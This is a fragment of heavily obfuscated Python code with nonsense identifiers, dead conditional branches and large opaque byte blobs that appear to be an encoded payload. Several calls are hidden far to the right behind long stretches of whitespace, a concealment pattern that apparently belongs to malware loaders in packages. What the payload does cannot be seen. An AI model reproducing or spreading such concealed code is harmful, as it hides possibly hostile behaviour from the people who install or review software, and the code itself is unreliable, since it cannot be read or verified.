\x13\xd4\x8cXOno!;8|\xda\x07n\xa8\xd7pN\xa0A\x16\x8c\xee}\xb4\xf3\xa6h\xaa\xed\xd5Kw\xe2\x1b\xdc\x92\x01h[~\x02\xc3\',\xf2\xe4XK\x9bc;\x1a}\x1f#\xd1\x03\x8b\xc5A\xc8\x1cZ\x85\xed\xec@\x02\x8bP\xea\n\x1d@sKA6\xcb\xf4Z\xe3\xffs\x93-\xa7S\x04)\'\xfd\x16\xf4\x06m\xed\xf7\xbdu\x9c\xa7\x992o\x19R\xb6\x88rqEFP)\xe7z\xdak\xe9s-H%\xd1!E"vI\x99\x90E\xfe\x9c\xd7V\xe7\xba\xa9\xf2\xdd\xc8w{\x18\'\xb9z-\xd1\x99\xe1\xca=\xd0\xfaca\xda\r\x91g\x17\x82\x8cO\x1cXC\xf3\xb6\x13\xbf\x8aX\xa1\xc5\x19\x1bYVi\xc1\x89\x07\x16<oS]\xc7y\x15;t\xe0\x1ehP\x1e\xa7`\xc5\xd9\xbe\xd5\x04\xdf\xb3\xb4\x04\x01\xddKr\x1am\xc0\xb6\xa2=\xd6\xd5\xf5\x9bk\x18o!\xf8\xb0\x9f\xc1b\xdc\x83\x82\x9d\xaa\xee\x8c\x0f\xbaE\xae,H2\x8a\xa2?(\x04\xc7wL\x17e\x8c\nL\x1d\xf5Z\x94\x90\xa6%\x8dd}+\xafp\xed\xd6\xb9W\xa8\x08\xe0\x0b&\xe7-%\xa8H\xd1I\x13\xd6Kw\xedd]\xc3\xdb\x85v\x9d;I\xc4\xd1\xd4\xe7\x1c \xd0\x85\\N}\xf68\x97\xcav2/\xea\x98\x99\xb8\x1c9+d\xd8i\xc5X\xb0\xaen\xf2:c\xc1\xb6~\xea\x0e\x12\x98\x1d\xd08~y\xd6\xef\xfc\xba\x07b/`%z\xe0\xf3\xfe\x08\x8e\xc9\xfd\x85\xc9n\x957\xba\x1cp\xb7"\x11\xa7\x1b\x9f\xb5\x00\xeb\xb3\xb8l\xee\x92P\xc4\xa8\x12K\xbe\xben\xd7y\xd4,b\xba\x11\xd3\xd3e\xdaL\x90Yn(\x17\xe6\x81nR\x11mr\xae\t\x8aJPS#}\x8d#m\x1ca\xb3\x88\x0b\x13\x08\x88Q\xa1\xba\xc6\x1b:D\xe0\x07J\x81\xc4\xd7\x0c\x83\xa5\xc3\xa4\x8fJ%\x08\xee9\xb2\xb9;\x10\xe0\xcb\x8c\xe6un\xf3I\xe9;\'\x0e\x9b\xad]5\x07\xcc\xddyi\xf2\x92\xb5\xcfN\xe6\xdc\x91\xd1\x1e\x98O\x9bt \xfa\xa6Al\xed\xea+.\xcd#\xb1\xe1\xdb\xb4y\x04\xfa\x16\x9ctS\xdd\x86\xa1\xd2\xdb\xc0\x97\xb6\x0f_<\xc7h\x86\xb3s`\x8bE\xef\x08\x8434`\x04\x80\xc5/d&\x8d\x90c\xb8\x88\xfc=\xaa\x96\xeeD<\xea\xc7\xe5\x1c B\xf2 \xa1\xc4U\x12\x92Mu_\x89\xff\xdd\xc6\xeci\x8bG\xad\xcc\xbdd\xef\r4u\xefe\xc3\xa4;\xad\xa5\x11Q\x0fE\xffN\xac\x86\xd5\xd9\x08\xb9\xd1\x9b\xd4u\x9a\xe0(\x80\x9cq\xd1$\xde\x9a\xfa\xe8\xe0\x8e\x947\xd1\xe3\xf4s\x0fd\xd174\xc1V\xfdse?\x9ded\xff9\r\x94\xa54\xdee\x89\x80?m\xbe\xae\xb7\xca\xff\x81\x172\xa7\xab\x91\x1c\xde\x8d"v\xdf\xc2e\xb7O\x94.:U]\xc6\xa9\xeb\x84w>\xd3\x9c\xf3\xe5d\xd3.\x84}\x07\xa1\x12%\x92\x9a\xd4\xa2aM\xadRC[\xd3\xbd\x82\xd7Y\x94\x99e\xe5\x13\xbb@\x87\x1d\x1b\xc0\xed!F(`r3\x08~\xf8\x08\xd0\xf6J\xd9\x1b8\xb5\xd7P\x03A\xf0\x14\\^3\x89\xab\x938z\x81\x89G\x96\x98+lA\xbee\xa4_U\xaf\xffJC\xd4\xaa\xbe\xc0\xb6_&fe;p\x13\xeb/\x90\xe1 7\xeau\x82\x81\xcf\x113\xa7V\xcav"\xc2\xda\x06\xf8\xaa\xb5N8\xcc\x96\x19\xeb\xed\xba\xb1e\x0fqo\xe1s\x18\x98_2C\x98m1\xbd\x88\x99"s\x93+"Vby\xea\x00\xd4T"\xbf\xb6\x9fUB\xec\xd4\r\x11vW\xa4~"\x98\x88\xe2\xd1,\xcd\xe7\x1b\x1a\x17\xbap\x88\xf2\xe4R\xa6\x80n8\xcbt\x1f\xa7\xd7G5\x1b\xe2\xf12\xc4#\xc6\x9a\x83\xbeR\xda\xcc\xcd\x11]\x9b\x15\x0f\x02\xea\xa2\x8f\x94c\xbcR\xbak\xdbu\x9b\xf9\xe9U\x07\\\xe5\x91E\x8c\r\xbe2ij3\xe4h\x88\r\xd6\'\x13\t\xe2FK%Mv\x92Rv.t6\x11\xe8\x14v\xd4\xaf\x976\x03\xf4\x85L\xec\x91"|/c@_\xadt\'+]\x14\x9b$\xbav6p\xf1\xe7G\xd6J\xb7\xa9n\xf8\xfa\x95\xee-\xc9Cf\x98\x15\x0f\\\xc3\x94\x1b\xafQ:\x8c\xee3\xc3\xbf\x15_\xcb\xde)z\x0c\x9e\x12^2\x81X\x99\x1c+\xf4\x99\xbe\xff\x99 HKH3\r\x91\xa6\xb3\xc00\xd7\xd6\xa6J\xe0W\xa6\xbdS&\x85\x98\x1bX\xae[\x1b\x9a\x1d.S\xe6\x87\xaf\xd8\xd1\xf6\x13*\x86\x8c8@\x80\x08,\x88@]\xb0\xe7\xe4\x87\x1d\xc5\xbb!\xd1\xe3)\xfd!\xed#\x06\xcf7\x88\x9d_\xefs\x92U.\xb4\xf49I\xd1\x85\xae\x8aJ\x92\x84uu]\xb5aI\xd1\x14\xa7\x97\r\xbf\x8b\xe32\x1ce]]\\\xe2\xb7\x96\xd1\x18\x0eM\xc4v\x04\xa1\xebT"\x0f0\xee\xbc\x87\xc24\t\xdd)\xca\xc6\xb5\xd2F\xeb\xeeu\x8cV\x05\xc9\x9c\x8c&\x9b\x0fA\xbd\xb4')

        Floor(Cube = -4911 + -98985).Add(Calculate = -97123 / Random.Math)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='IIJJLILIIJLJJLLJI',Square=b'\xa9\x8d*&\x90\x15J\xe7\x04\xc1J\xeb\xa5;\x11\xea\xc4\xa1#\xce\x1c\xc9\xd7a\xf3%\xfaV\xd7]W7\xdd^\xa8[o$\x83\xa0\x95\x14Q[DmD\x9c\x15KJ\xf7V\x88zu\xf4\xde\x94 \xe3\x92\xb1Bb\xf7\xe4!\x92\xcf\xf6\x90AB\xc2\xf9L\x05\x150\xabS\xa5\xac\xd3!\xd9\xb8b\x82Z\x12\xe8\xaf\x19\xea\xb1!\x8f\x90Zi3\xad\xae\x87\x9au\x82<U}\xdeYR/}C%y\xd5Ju\n\xc9)\x0bX\xa6N\x91\x9fm\xd8,5e\x88\x83!\xc6\x84\xee=\x04t\x86h\x1e\xad\x956\x03\x0c\xf4p\xaa\x0c\xf9\x87!\xc2\x05\x82rY3e6E\x84\x01\xf1\x81`\x07Ce\xb6V\xda\xcc\x8e\x02\x13%\xf6Q\xb4\x98\xa4\x08c\xc8\xea\xa5o\xa3\xa8\xf9L\r\tx\n"\xc2\xeb\xe3\xb5\xd6Jw2\xc7o\x1b\x89\xf7\xcay\xda\xa5\x02\x0e\x82*Plabo$\xdcj\xd6w\xfb\x88l\xf6\xaf\xc9\t\xd4cV\xac\xacZ\xba\xe3\xb1\xbf\r\xeed\xbau\xdb\xe9\xe0\x04+uP#\xf6\xe0\xb7Y+\xb7\x01X\x02\xa00b\x1e\x88\x1b\x17J\xb9\xad\x86\xf7\xd3RzZQ\xd5]\x00%:\xc9sw\xa0IN\xc5\xec\x1f4\x8a.\xed~i_\x0f\x04\x93p\x15\x9d\xfc\xd8\xb2!\xda\xa8\xbd&u\x9b&8\xd9K/\x9a\x1dKg"\xe9d\xbb\x1c{G\xe5?)Hg\xa4\xa3\xb4\x8d\xafP\x00\xd9cm&\xb2\xc8!]\xf0\x03\xc5\x00\xcfNG\x91Z\x9e\x80\xd4\xbb%\x0f\x89\x00\xcd\x10lFH\xb3\x9dZU8\x9a\xc9\x90\xb7\xb1\xfb\xab\xbbX&\x93\xdc\xda\xa4\x84\x90\xb8V!^\xb7c^\xf76Vr\x93ao\xb2\xc4\x94W&\xb3p\x05\x8f\xdbM"\x8cJ\xdaCs\xdfl\xa5\xd3\x85Y6H\x82\xed\xd1\xe2P\xc4\x07\xa2/\xa1V\xa7\xc2{\x8a\x0eTR7\x89\x9d4\xfeH\x89/*\xa5\xcdv\x16\xa2e\x87\xd4\xea\x88\x1d\xbe\xfdzi[\x0c\x8a@\xa1\xc5@#\xc6\x1a\xc1\x98D\x16\x06eS\xddp\'\xee\xa1 W2[?\xdd\x9a\xb7\xeb\xe0\xf3\x85\xa6V`7/8}\xdb\x85\xde\xbe\x16\xd2\xf0F \xd15\xb2\x83-\'\x94%\x06\xf3\x9d\x1d\xb3\xef$F\xdf\xb5\xeb\xc5ZuLZ\xa2\xc8Z}L2#Y\xad\x1c\\e\xb8\xb5\xaeq\xf0"\xd4\xaa\xcf\x1c\x02\xdd\xa9<.tW\xc2\xd5\xdc\xe3\xdc=\xb5\xd2\xb62\xbb\x04e\xd8\x1e\rI\nig\xf4lR\xd7}J\x9e\xd7\xa5\x88\x9e>\x14w\xefo\xbe\xcf\xe6O\xb3\xc5\xe3\xfb\xd9\xdd}\xf1\xf0\xf4~4\x9f{\x93\xd9\x83\x97\xbf\xe4coZ<\xdc\x8d\x9e\xbc\xd9S\xfe\xe0-\xf2\x97\'\xafx\x98x\xf7\x0f\xb3\x85*S\xcf\x87\xd1\xe2\x97\xdc{|z\xf0\x8a\xfb|\xf1\x0e~r(3\x05\xa6\x1f\xc1T\x9ej\x02\xe1c\xfdep.\x87\x19\xdc\x8d~\xc9\xff\xc7\xc3\xe8\xe6\x1d\x17\x14\x8f\xb2\xf5\xf8\xeb\xf7\xa7\xd9\\\x7f\xfa?su\xf8P>\xde>\x16\x0b\xd9\xbe\x19=\xe6I$\x9f\x9eg\x8b0\x18?\xfc\xb8\x7f\x92\x92\x87\xfc\xff|\xcf\x1f\x9f\x1e\xe9\xe0\xa3Y\xf1\xcb\xc3\xe8NN\xe0\x1f\x8a\'\xef\xe9\xc7}\xae\x0f;z\xfc\xb1\x18\xcf\n}\xdc\xef7\xf7\x0f\xc58\x7f\xd4\x15\xee\x1f\xe1\xbc\xbc\xe7\xbb\x99\x94\xcc\x8b\xf1h\x9e\xd3\xee\'\xa3\xa7\xfciv\x97\xcb\xfe\xe53}k\x7f\xf38\xcf\xf3{*\xbe\x1f=\xfd:\x9f\xdd\xc87\x7fQ\x1f\xe9\x8b?\xc1u\x14\x93\xe2.\xff\xf4\xa7\xd9\xfd\xaf\xf9\x83T\xf9\xfb?_\xd6j\xfc\xb3\x9a\\\x0b}a\xbf\xe4O\xd7\x0fXr}\xf3\xe3)\x7f\xacU\xffWu\x15\x9f\xfe2\x9aLf\x8b_\xe4G\xf7\xa3\x89\xf7}\xa1^\xf5\xc5\xfex\xfa\xabl\x7f\xff>\x9b,\xb9M\xb5\x062\x97\xdb\xb4\xad\xed\xca\x9f\xb0\xc6\xa7\xd9\xe2\xfe\xfb\xd3\xf5t6\xd7\xed5\x80\x92\x7fT\x05\xef~_\\?\xfd\xf5\x04N\xed\x13\x1c\xeb\xaf\xc5"?\xe4U\x91(*.\x84\x85\xe8\xf3\xd1\xbb\xf1\xf7\x87\x87|\xf1t\r5O\xe4n|Z\x14\xcf\x87\xb8\x9b\xa3w\x93|\xfa>_`\x8f9|\x18={\xbf\xe5?\xbc\xd9\xefG\xc7\xef\xde\xab\xbf1\xb6\xfa\x89j\xeeO\x8b\xfc\xf9\x10\xbe\x83\xed\x8b\xe1\xe9\x9f\xaf\xff\xf4\x0f\x7f\x82\x8aXO5\xd9$\x9f\\\xab\xfd\x8fN\xd46\xec\xe8\x93\xda)\x0c\xbb#\xfc\xc5\x8d\xea$\xbf]?\xce\xfe\x9a\xd3\x0f\x1e\xf2\xa7\xef\x0f\x0b\xee\xbb\x9fn\x92\x88k\xcf~\xff@\xc7\xfc$\xe7d\xed\xfaH\x8f\xe5\xa3w\xb3\xc9M\xf1t2\xc4\x14/\x94\xdc\x0f\xb2l\x80\x97\xfb\xddS\xf1[\xbe8!\xf5\xc7\xc4\x04\x81\xb2\xf6\x0e~\xa3n\xc3!U\xc1\xd7#\x18\xb0\'z\x82~\x11M\xea\x9d\xba\x1b7p\x03\x1e\xe9(\x90D\x90\x98V\n\xcc\xe9\x01.\xf5w\xf7\xa3\xc7\xc7\xe7\t\xffZ\xb0\x87\xcf\x12\x13\xff\xfc\xfcn\\\x14\xbf\xcdp\x17`\xcf,\xf0W\x05\xa4\x13\xf0\xdfA\xaf\xa7\x16\xa3\x9c\xbf\x10\xe6\x87S\x85\x925\xce\xce\xde==\xfc8.\x1e?\xdd\xfd\xa6\xa6\xa1C]\x17\xcev\x9c\xdf?\x1d\xc3\x91W\xd4\xf9\x00\xf9\n\xf0`\x98\xf0\x12\xdbF\x9d{\xa3\x9f\n-,\x9c\xc59\xb2\xc5b6\xe2F\xbf\x95\x06\x94\x8bg\xd0\xf7\xf3K\xb3\x93\x86\x93,(YcA\xe9\x16\xe0\xbf\xd1o-=\x9c\xb4_\xd8*\xff\x12\xba\xb9\xea<\xd0\xa5\xfe2\xfa1/T\'\xa5\x8e\xe6\xdd\xd3G\xee\xf1\xdc1\xb9\x13\xf2/\x0e\xa5\x0e\xee\x06\xa6\x96\xd1\xe2i\xf6\xfb\xec\xe1\xfb\xe3\xf5l1-\x0e\xf9\xc7pz\xb8\x81c\xe7D\xcd\x91\x9f\xbe\\\x0c\x0e\x8ft\x99\xf9\x99\x9a4&\xdf\xc7O\x8f\'\xdf\xae\xf4\xb7j\x9e~\xf8qb\xd65Z\xe2\xd4S\xd7P+\xd1{\xfe\xe5\xfb\x99:\xcbO\xf8\x93C|=2\x87^~\xa8O\xa3{\xb5>M\x0e\xf9\xf3\xa7\xc9\xec\xf1~>\xfa\xf1yt\x97\x9b3\x9cM\x97\xfc\xb2\xbcgn"\xccI@)5)\xe9\x92\xef\x7f\xba-f\x8b\xc3\xfa\xef\xcd\xee\xf3\xf9c\xbetox\x9d\xfc\x84%\x1d\xde\xb1\x1e\xdd\xc4\xf7\x7f\xc6\xb7Y\xb1P\xb3\xe6{k\x17\xfad|N\xf0\x89\xbd\x08\xcf\xa6\xc0\xb4\x9f<\xc1M\xae\xc7\xbf\xaai6\x97[\xf5p\xf2\x95tL\xa3^\xaa\xe7;\xab\x91\xc7\xd0\xc2\xaa\xb3\xdd\xc3\xaa~\xc8\xa3Z\x18lT\xa7\xfe\xf4\x90\x8f&\xf3\xd9"\x7f<\xb4\x9a^\xb5\x1f\xac\xf5g\xb8\xe0\xc3P\xa2\x10^\xd8\x17\xec\xb3|\xedf\xf1\xf8\xf4\xf0}q\x08\x8a\x01c\x0foQ9P\xef@R9\xf7\x1e\x7f\xcd\xe7\xf3\x13\x11tLS\x91\xd8sTn\xd0\x13\n\x85$\xb3\x0f\xbe\xd9=\xfb\x01\x1bd:S-\xa2\x8e\r\x13\xdc!\x8c\xa1k\x18M|\x1d\\.]\x93?J\xf7\xe1\x0ck\x98\xaa\x1c\xe7-\x90u\x8e\xea\xfd\xbf\xb8\xb9\xcd\xa1\x83\xab&\x9c\xcf\x1e\x9f`\xc4\x9a\x03\x99\x1e\r3\xec\xb5\xfa\xf2\xe4\xdb\x14[~\x8a\xcdN\xbf\x85\xd6\x84;\xa0~\xf1i\xf6\x08{\x90O\xd8\xd1\xf4\xee\xbc\xa9\x12\xe5J\x83dZ\xcc\' .,\xcc\x01\xcaM\xff\xa4\xe4\xb8\x13\xaa\xf5I\r\x83\xd9\xd3a\xb9\x15g\xd3C\xa8\xf2M\xb20^\\X\xfc~W\'\'lk\xbf\xd4\xea\x9d\xfa\xab\x8c\xc0%mG\x07<\xaa\xf6^\xaee\xf5w3i=\x8e\x1f\xf2|\xf1\xf8\xabZ\xb5x\xff\xa6\xe4D\xcb\x8f\x9f`\xb5\xe2K0\xdfc\xe3\x9c\x94\xdaLO\x9a\x1e\xb0\x1f\x01\x0f\x12\xf41\xa5\x87\xe2\x7fu\x07\x9f\x1eG\xbf\xe7\x87\x95\x1dz\xd4\r\xcd\xf4\x04]r@s\xe3\xfdx\xf5|X\xdc)\t&\x7f\xb8.\x1eO*\x1d\xdf\xb6\xa5\xd2$\xee\x8dG\xf7\xaai\xf2\xeb\xe2\xfb\x93\xfa\xd5\xc9\x19Q\x04\x0f\xa0\xdfA\x87;\x87qu\xce\xe3\x82W\xf9;!\x0fR\x1bG\x9fT\x8fS\xbf\x15\x81!\x7fx(\x1e\x1eO\x06\x1cIO\xd9\x01\xcf\x90p\x18\xaa>\xcc\xee\x0f\x8f\xa8\x1f\xf0\x88\xfe\xf6\x99q\xe5t\xdf\xa9\x0f`7\xb8\x92\xfaM\xa6\'\xfb\xa2?+AmI\xb3\xdc\x7f\xaf6\xc7\xb7\xe1\x90\xa5\x99!\xaf\xde$o\x14C\xefE\x04\x15\x0eqxy\xf1\xd8\xddwq!\xa2\x9fz\xf7\xe0\xce\x82\x85\x01n+\xe2\x99\xd5\xdbU\xb5Q\x87\xe8g\xc59sH\xb3&\x1d\xd3\xc3\xc1\x01\r\x0c\x12\x00\x88\x04\xd8j\xeaU7k\xa9\xc9\x0eY5#\xf5W\xbf~\xf9\n\xaa=\xc8\x13\xf0s\xb5\x81\xf7M5\xfbU\xa3\x96S\xed\xb2\xbc\xc5~\xa9\xb7\x18\x82\x1bI\xb8\x92<MC\x94\x0b\x8b\xea5C\x12\x1d\xcc\xa9\x03\xc2\xd1)n\xa8\x0b\xa6~$\xad\xc7R\xf4\xe7\x8bU\xbdH\xd6gY\xaf\xf0Y\xe9?\xe4}\xe5>C\xfe\xd8\xd7u\x9d_V6\x80R\x13N\xd4\x8e\x0e\x95\xf2\x89\xcfJc\xd0\xd0\xa4\x95B6\xd5\x1aR\xbd\xf9\x98\x95\x0e3\xd4\x15\xf8\n}\xcd\xabM`\xf8\xa7\x9b\xe7B[\xe0>3\xdf\xe9\xc5\xe7\x15\x8d$\x16\xb0\xa0\xe4\x8f\xac\x0c6\xd5NZ\xe4\xa6PQ\x8e\xe1yy\xb9:\xfa#\xaf\x9e\xc8\x80\x01\xdd\xe7\x1cE\xd3\xc1\xf9Q\xa3\xf6\x83V\xd2\xed\xf7\xfd1\x7fX(A\x07&C%\xbf\xe5\x8b\xdf\x0fe%7G~y\xa6\x1d\xffZ<>U*\xcf\x898\xfa\x96\xccv3\xa4\x90\x83A\xb5d\xdd\xfb\xf5y6\xb1\xfb\xe7\xf8\xd7\\\xa9>\xd4\xea\x87\xbc"\xdf\t\xdb\x99\xb0\xd9/\xb8\x0b\x8a\xe9\x90\xc3\xb6\xe0m\xc5=Yv\x9b\xd4"\xbb\xb0\x0f\xfd\x97\xc1_\xfe\xec\xa9RuK\xaa\xc5Z\x95\xd2\xf0L\xbe\xb5\xd4\xed\xf1\xe6`\x08\x04q\xe5\x91h2\x9b\x1d}\x9b\x8b\xe8\xc1\xc2\xc7\xfcU\x9d\x1a\x1bgy\xaf\x9e\xdd\x9f\x88\xa9\x02Z\xfd\xd0\x9au?_\x18l\xc3\xd1\'\x98\x9d\x9a\x1cK\xedp\xc5\x91\x16jF\x9e\x8e\xc6\xb9\xa7tK\xd5U\xc1\xa6s\x08\xd6\x9dC2n(]\xf7\xe9z6\xbd\xc6oUWU_\xdd\xa9\xf7#\xb3n\xdf\x8d\xc6\'\xf8\xed\xb7\xdb[\x9cag4\xd5\xde\xe2\xd6\\\xb5\t|\x0bF\x81&\xe7)')

        if 126260 > 2818034:
            Random._add(_round = Random.Math + -27962)
        elif 274540 < 8321273:
            Random._add(_round = Random.Math - 8240)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='LJJLLILJIJIJIILIJJ',Square=b'\xa7cNW\x8e\xb1\xfc\xfc\x1f\x7f<\xaa3\xba&\xbb\x8bw}B\x1b\xd0h\xb4e\x892\xf3\xd1\xe2\x97\xefJF8)\xfd\x06\xe4\xaar\x01\xc8\xe5\xef\xcd\x98\xe6\xee\xc0\xdd\xa2\xc9E\xe8\x03\xe9S\xd6j\xc0\xc92\x85\xa9\xa4l\x99E\xd2S\xd3\xbe\xa7f>O\x8d^O\x06\xad\'\x03\xd2\x83\xee\xe3\xcd\xee=s\x07U+yrlO\x1fD\xebi\xe3\xe2\xfbB\xb5\xdd\xe1\xec\xfe\x9a\xef\xc82\xd1D\x95\xdf\x17\x8b\xc7\xbc\xdc\x01_iwL\x92 H\xfai\xa4\x1e~\x1a\x86\xa3`\n\xa4X\x98\x89\'O\x92d\x1a\x00\xbaC\x95\xa57P\x1aO\x93^\x12%Q\x1a\x00Y\x98zLT\xedQ\n\x14by\x03\xab\xa5\xb9\xc3hA\x90\x0b\xf8\x04\x86A\xeb\xf6\xf3\xe5\x83\xe1g\x84\xd7\xf4,\x93,\xb3\xf6\xd1\x0c\xf8\xec\xa1\xce\x82\x0b\xf5\x19*\xfeg\x98*\xe6\xbc&\xa9\xf2\x0e_\xa1\x99\x19\xc9DKP$D\xe3=\xbay(\x9e\xd5]\x16\x81qt\xf2\xed\xdd\xbf\x97\xe6;lji\xe5\xb9H\x9c\xf3\xc1\xb15_\xb1\xe9\x0b\x9e^\xe5\xc73\x12m\x91\xe7S\x89\xbb\xc7%YX}Ps\xfb\xec\xa1X|[\x88\xf0\xa8\xdd\xe6\xea\xf5\xca\x13c\xc4\x10\xa5\xa4\x82\x04$L\x9b\xeb\x89\xbdH7\xa8\xda\xf4\x86\xa7\xa4\x11\x9f\x92\x0e\x8a)\xfb\x8a\xc2;\x17\x93\n4.6\xb5\xc7\xbd\x87\xe4hx\x1e\x95O\x9d\x0c\x19,\xcf\xd2\xd9\x1d\x97\x94\xb6UWB\x1e\x08\xe9\xb0_I\xbd\xfdr\xe51\x19\x83d|\xd3\xb1\xf8\x1eF\x87\xb0\xe0\x84\xd2&\t\x03\x9eA\xed\x8b\xda\xc3\x0fO\xc4mC\xb7\xa3\xfe\xbcK\xe15\x0b\x98\xe6^\xf0H\xaa\xb3\xfe\x87W\xb9\xad\x15\xee3\xf9Ep\xfc"i\xe9^\xa4}\xcb\xed\xb2\x10U\x81\xad<\x8cnXycY_fe\x19\x1b\xfd\xca\x13o"_\xd4\x05\xcfx(6\xd3t\xce\x0b\xbd\xea8\x9e\xfe!\xdd\xaa\x81,\x80\x1eF\xd5\xb05\xd0G\xe1\xd9\xc3\r\xec1T\x02V\xb8\xca\x8d5}V\xd3\t_|nxk\xd9\\\xc1\x86\x0b\xf8\xbb\xf2\xd8\xc7 \xb9S\xcet\x1a\x15\x8f\x85p#\x9b\x7f\xd1\x9dV\x84\x1e6Y>{e\x9b\x1dl{\xe6\x0e\x05%\x1a\xabe\xb7s B\xf0@\xe7\xbb?\x161\x94\xa7I\x92\x17\xbc\xda\xcf\x06b\xea\x9a\xeb\xf7\xf9\xca\xbbik\xdd\xd4\xc3.\xaf\xbc\xb2\x964DC-|\xf4 \x9a\x13\x055\xdc\xc0\xc5YM\x08\x9eL%|7y\x04zd{\xb9\xa5\xfa$\xf0\xccn\xbd\x0b\xa3[\xf1X\x00\x19\xa4|\x19\xd2\x92\xc2z\xc2\x01\xe8\xcdn*\x9d3%-\'#1\xe6\x9b-\xe0\xce\xe2<|\xc6\xfa.h\xadg\x1e\x1a\xb6\x86CF\xc72\r\xb8\xa7}\x8e\xf8N\xb7\x1b\xfe\xbcS\xc6\x93\x83\x96\x03O@\x99\xa3\xea\xe3\xcdM\x8b\x0f\xd8\xac\x04\xef\xcb\xee\xae5\x86X\x9b\x18\xcc\x8f\xc5P\xa7o`\xe5\xde\xe2\xe9\x82\xbe\x0eK\t\x99\x95\x07\xab\xef\xab\x9e/\xb8\xcf]\x06W\x1e\x97]jQX&\x0b\xcf\x9e\xe2\xbe\xe8eZ\xbd{zX[\xba\x97Z\x15h\\B\x93\xa1!\x9f\x0c\xe3j\xb8RX\x1c|\xa4\xc6,\xfc\xa3\xeatcs\x89\xb1\x81B=\x9b\xdd[I\xae\xf9\xa2\xbd\x02\xf0z\xe5\x81"A\xf2\xe2|&,\xd4\xf3[\xcf8qXw\xc4s7\xab\x12\xdb\xf4<\r\xf1\x94|\xf6\xb8\xed\x89\xeb\x99_i\xe2\x87\xc2e\xf7tH\xce\x08\x9f\xf3\x1a\xe3\x02\xa7\x9e\xc7\x94a\x16\xfe\xb9\xa3\x9c\x9eV\xc6\xec@\x0fW\xd1\x82\xd7\xdcVc\x1e\xa3\x81\x0bK*\xd9\xf6\xf1\x80hw\xf0(\xee\x01\xcf\xe8\xf4\x14W\xccS\x08\x88\xf00c\xdd\x80G\x01\x9a\x1b\x07\xde\xa5\xa5LR\xd7\x08\x82\xca=\xc3<\xb9\x05v{X\x85!\xae\xa2\xd9\xed"K\x05\xaa\x98\xe7l\xb0 \x13\xc8\x95\xa7\xef\xa4\xf6\xe5\xa3\xedE\xb4{-5C\x9f\xf3^\xf4L\xa0\x17Y\x9c\x87@\x1c\x81[>\'\x08\xc8\xb2\xdb\xa2%2\xb3\x0e\x1e/,\xb9D\xa4\x14\xd5\x0bJ\xbf\x93\x13fx\n\x8c\xba\xf3\x95\xb7\x05\x17\t\xb8F\x14\xf5\x06dZ;\xbb\xf2L\x9f\x11\xc9\xe1\xcbW\xcf\xba\x832\x12/\xbdg\x8d8\xe4f\xf1\xcc8\xd4o\xd5\x85\xef\xc2dF1&\x84\x86K_\xa9\xab\x9b\x9b\x7f\x89\'\xfdU:=\xc9\xea\x1e\x9d\xfc\x179\x17\x11\xdd\xd5\xfa\xa7s\xef\x88p\xc2\x8b\x897\xe7\x9b#\x1a\x9c\xd2\xec\x97\xdd\x9d\xca\xb2I\xcfc\x9d\xca\x87\xdfp\xa3|\xf1\xb7h6\xb8E=\x11\x07\xbf\xea\rkV9\x99\xee\x82\xc0\x9c\xe9\x95gq\xa4\xb3\x88\xea\xdd\xa2\x8f\x00TN\xcciE\x1d\xcc\xa3\x1eL\x93/\xbc\xc0\xbf\xa7\xcfO\xb7$\x98\xac\xcb\xa7it\x1d\xd3\x11\xd4[\xb3{$\x11\x07\xda`\xca\xf6R\xcf\xbe\xe3<!\x9f\xb19\x90\xc6\x18\x8a,\xb8\xcay\x96H \xd2\xfe\xc0\xbb\xb0\'\xc6\x0b1\xce-\xb9A4{\xe0\xc4u\x8a\xce\xc4c\xf2U\x90\x87\xf5\x9c\xcd\xc6\x83\xf3\xf2U\x1b\xd1V/\x1b+\xef\x8dY\\,\xc3\xf0\xe7+\xcfHf\xbc*\xa9\xc5\xc8\xdc?\xcd\x00\xca}\xce\xfb"\xdd\xd2x\xa1\xa8\xc5\xbd\xcbKkf#\x81\xab\xa2\xd4\xb0\x04*k2\xb4W\xb3\x1b4\';\xc5\x8c\x8cYs\xe8\xf30\x1b\xd1J+\'\xc7\x1d\xcf\xbb\xd3\xd6x\xd6\x87\xbc\xd2T\xa7M\x81\x17\xde)67F\xb1\x9d\xa2\xea\x836\xd5\xd3b\xd9\r"\x9f4\xda`\xa5Zql\t\xe8"E\x96/\x19\x8dP \x98\xcfP<\xc3\x93_y\x87\xb8Q\xe5.0\x8e\xf4\xca\x93uK|hs\x92\xa5|\x96\rX\x16\xf0A2\x12\xd3\xae\xfc\xc4\xd3\xf9+\x9eE\x8d\xc2\xa9\xf9\xa8:\xc8\xd1\xe4.\xe6 \xf5\xdePL\xd0\x02\xa4\x96\x11H\xa1\xbc\xf2\xd0\xe6\xc9\x92=IS8Z\x06\x9e1\x94>\x8b\xf6\x89E\x9e\x96\xe3\xc5\xb6\tb0\xcd\x0f$q\xccI\x1aV\xb7~\xa9bf\xa4\xad\xc0\x00\x18\x83c6\x02\xe2\xd5\xe1JV\xd5\xb4\xc51\xa9\x07\xf0ji\xcf\xce\x19 :4]-z\x15qZ\xe0E\xd8\x13-\xd96\x00\x80\xb0N\xd9\xfbf\xa4\xe0\xabwO\xe8\xe5\xb42\xbeD\xa1\x16\x17\x13\x83\xe4\xe1\xad\xe1\xf2\xc3M!\xba-l\\yr\xe6&\x0b\xc2\xb3\x87\xc2\x07\x0c\x03\x92\xb9\x87\xa7\x1e\xf1\x0f\x10\xfd\x00\n\xfa03yz\x1a\xd3\x96t|[*\xaa\xa1\'\x1b\x95\x034?\xb0\xd8t,Nk=W{\xcb\x17\xab\x97\xf2y\xaeQ\x95M\xa7\xc7FW\xc2Z\x81:,+U\xf0\xc13\xceP\x9e\xe4=\x99\x93\xf5\xbc\xa0\xcaP\x9e#1\xbb 5\xd93\x0e*\x99hi\xab*\xbd!i\x03[N`R\x81\x97\xe1i\xc3\x19N&Dq\x91_y\xfa8\xf6\xe4\xa5\xce\xd0X\xbf\xa4\xdfxz\x11\xb0\x98\xa5<m6(\x1b\xfd<\x91\x01+T\x97\xcbn\xa0\xe8\xd4Z\x1bP\xba!!\x97|6(\x81^\xa2\xda\xb7\xa6{\x18\x85\x83>\xac\x13\x19\x8cxvid\x11%\xb9\xca`\x13Z41\xecX\xde.\x12[\xf5\xecf\xe8\xd3<\xa3\xd0\xcbb<\xf0\x8c\x1e$\xce\xd6\xaa\xa0g\xee\xee\x85\x8eJlv\x03\xc5\x1dBp\x9e;-\xed\xdc]yb\xf9\x1bX=\x14\x84\x83[\x16\xach=#\x03\x8eR\xdcmIF\xac` \x1c\xde\xe9=\x8b 